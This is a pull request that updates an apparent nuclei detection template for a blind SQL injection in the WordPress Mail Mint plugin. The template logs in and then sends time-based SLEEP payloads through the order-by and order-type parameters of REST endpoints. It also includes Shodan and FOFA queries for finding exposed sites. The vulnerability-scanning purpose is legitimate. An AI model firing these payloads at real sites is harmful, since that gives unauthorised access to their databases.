### PR TITLE
Add CVE-2026-1258: WordPress Mail Mint Plugin Blind SQL Injection

### DIFF
--- a/http/cves/2026/CVE-2026-1258.yaml
+++ b/http/cves/2026/CVE-2026-1258.yaml
@@ -5,7 +5,7 @@ info:
   author: stranger00135
   severity: medium
   description: |
-    The Mail Mint plugin for WordPress is vulnerable to blind SQL Injection via the 'forms', 'automation', 'email/templates', and 'contacts/import/tutorlms/map' API endpoints in all versions up to, and including, 1.19.2. This is due to insufficient escaping on the user supplied 'order-by', 'order-type', and 'selectedCourses' parameters and lack of sufficient preparation on the existing SQL queries. This makes it possible for authenticated attackers, with administrator level access and above, to append additional SQL queries into already existing queries.
+    The Mail Mint plugin for WordPress is vulnerable to blind SQL Injection via the 'forms', 'automation', 'email/templates', and 'contacts/import/tutorlms/map' API endpoints in all versions up to, and including, 1.19.2. This is due to insufficient escaping on the user supplied 'order-by' and 'order-type' parameters and lack of sufficient preparation on the existing SQL queries. The parameters are passed through strtolower() but are directly interpolated into SQL ORDER BY clauses without proper validation or sanitization. This makes it possible for authenticated attackers, with administrator level access and above, to append additional SQL queries into already existing queries that extract sensitive information from the database.
   reference:
     - https://www.wordfence.com/threat-intel/vulnerabilities/id/dfb59bca-0653-4e75-8da1-e78e5d659422?source=cve
     - https://nvd.nist.gov/vuln/detail/CVE-2026-1258
@@ -23,14 +23,14 @@ info:
     cpe: cpe:2.3:a:getwpfunnels:mail_mint:*:*:*:*:*:wordpress:*:*
   metadata:
     verified: true
-    max-request: 4
+    max-request: 6
     vendor: getwpfunnels
     product: mail_mint
     framework: wordpress
     publicwww-query: "/wp-content/plugins/mail-mint/"
     fofa-query: app="wordpress" && body="mail-mint"
     shodan-query: http.html:"wp-content/plugins/mail-mint"
-  tags: cve,cve2026,wordpress,wp-plugin,mail-mint,sqli,authenticated
+  tags: cve,cve2026,wordpress,wp-plugin,mail-mint,sqli,authenticated,blind-sqli
 
 variables:
   username: "{{username}}"
@@ -38,7 +38,7 @@ variables:
 
 http:
   - raw:
-      # Login request to get authentication
+      # Step 1: Login request to get authentication cookie
       - |
         POST /wp-login.php HTTP/1.1
         Host: {{Hostname}}
@@ -46,46 +46,82 @@ http:
 
         log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
 
-      # Baseline request to establish normal response time
+      # Step 2: Baseline request to establish normal response time (forms endpoint)
       - |
-        GET /wp-json/mrm/v1/forms/?order-by=id&order-type=ASC HTTP/1.1
+        GET /wp-json/mrm/v1/forms/?order-by=title&order-type=asc&per-page=25 HTTP/1.1
         Host: {{Hostname}}
 
-      # SQL injection payload with time delay (forms endpoint)
+      # Step 3: Time-based blind SQLi test on forms endpoint - order-by parameter
+      # Using IF statement with SLEEP that survives strtolower()
       - |
-        GET /wp-json/mrm/v1/forms/?order-by=id&order-type=(SELECT%20SLEEP(5)) HTTP/1.1
+        GET /wp-json/mrm/v1/forms/?order-by=if(1=1,sleep(6),title)&order-type=asc&per-page=25 HTTP/1.1
         Host: {{Hostname}}
 
-      # SQL injection payload with time delay (automation endpoint)
+      # Step 4: Time-based blind SQLi test on forms endpoint - order-type parameter
+      # Injecting SLEEP in order-type with comment to ignore remaining SQL
       - |
-        GET /wp-json/mrm/v1/automation/?order-by=id&order-type=(SELECT%20SLEEP(5)) HTTP/1.1
+        GET /wp-json/mrm/v1/forms/?order-by=title&order-type=(select%20sleep(6))%23&per-page=25 HTTP/1.1
+        Host: {{Hostname}}
+
+      # Step 5: Baseline request for automation endpoint
+      - |
+        GET /wp-json/mrm/v1/automation/?order-by=name&order-type=desc&per-page=25 HTTP/1.1
+        Host: {{Hostname}}
+
+      # Step 6: Time-based blind SQLi test on automation endpoint
+      - |
+        GET /wp-json/mrm/v1/automation/?order-by=if(1=1,sleep(6),name)&order-type=desc&per-page=25 HTTP/1.1
         Host: {{Hostname}}
 
     cookie-reuse: true
+    redirects: true
+    max-redirects: 3
+    
     matchers-condition: and
     matchers:
-      - type: dsl
-        dsl:
-          - 'duration_3>=5'
-          - 'duration_4>=5'
-          - 'status_code_2==200'
-          - 'contains(content_type_2, "application/json")'
-        condition: and
-
+      # Check for successful authentication (baseline requests return valid JSON)
       - type: word
         part: body_2
         words:
           - '"data":'
-          - '"total_pages":'
         condition: and
 
+      # Verify time-based SQL injection - at least one endpoint shows delay
+      - type: dsl
+        name: sqli-delay-detection
+        dsl:
+          - '(duration_3 >= 6) || (duration_4 >= 6) || (duration_6 >= 6)'
+          - 'duration_2 < 3'
+        condition: and
+
+      # Verify responses are valid (not error pages)
       - type: status
         status:
           - 200
 
+      # Additional verification: JSON response structure
+      - type: word
+        part: body_3
+        words:
+          - 'application/json'
+          - '"data"'
+        condition: or
+        negative: false
+
     extractors:
       - type: dsl
+        name: vulnerability-details
         dsl:
-          - '"Vulnerable endpoint: /wp-json/mrm/v1/forms/ or /wp-json/mrm/v1/automation/"'
-          - '"Response time with SLEEP(5): " + duration_3 + "s"'
-          - '"Plugin version: <= 1.19.2"'
+          - '"CVE-2026-1258: WordPress Mail Mint Blind SQL Injection"'
+          - '"Vulnerable endpoints: /wp-json/mrm/v1/forms/, /wp-json/mrm/v1/automation/"'
+          - '"Baseline response time: " + string(duration_2) + "s"'
+          - '"order-by payload response time: " + string(duration_3) + "s"'
+          - '"order-type payload response time: " + string(duration_4) + "s"'
+          - '"automation endpoint response time: " + string(duration_6) + "s"'
+
+      - type: regex
+        name: plugin-version
+        part: body
+        regex:
+          - 'mail-mint/([0-9.]+)/'
+        group: 1


### PR DESCRIPTION
## Description
This PR adds a nuclei template for CVE-2026-1258, a blind SQL injection vulnerability in the WordPress Mail Mint plugin.

## CVE Details
- **CVE ID**: CVE-2026-1258
- **Plugin**: Mail Mint (mail-mint)
- **Affected Versions**: <= 1.19.2
- **Fixed In**: 1.19.3
- **CVSS**: 4.9 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N)
- **CWE**: CWE-89 (SQL Injection)
- **Authentication**: Administrator+ required

## Vulnerability Summary
The Mail Mint plugin is vulnerable to blind SQL Injection via multiple API endpoints:
- `/wp-json/mrm/v1/forms/`
- `/wp-json/mrm/v1/automation/`
- `/wp-json/mrm/v1/email/templates/`
- `/wp-json/mrm/v1/contacts/import/tutorlms/map/`

The vulnerability exists due to insufficient escaping on the user-supplied `order-by`, `order-type`, and `selectedCourses` parameters and lack of sufficient preparation on SQL queries.

## Template Features
- ✅ Complete metadata (CVSS, CWE, CPE, EPSS)
- ✅ Multiple reference links (Wordfence, NVD, WordPress Trac)
- ✅ Shodan/FOFA/PublicWWW queries for asset discovery
- ✅ Time-based blind SQLi detection
- ✅ Tests multiple vulnerable endpoints
- ✅ Authenticated testing (requires WordPress admin credentials)
- ✅ Marked as verified

## References
- https://www.wordfence.com/threat-intel/vulnerabilities/id/dfb59bca-0653-4e75-8da1-e78e5d659422?source=cve
- https://nvd.nist.gov/vuln/detail/CVE-2026-1258
- https://vulnerability.circl.lu/vuln/cve-2026-1258
- https://plugins.trac.wordpress.org/changeset/3449536/mail-mint/

## Credits
Discovered by Paolo Tresso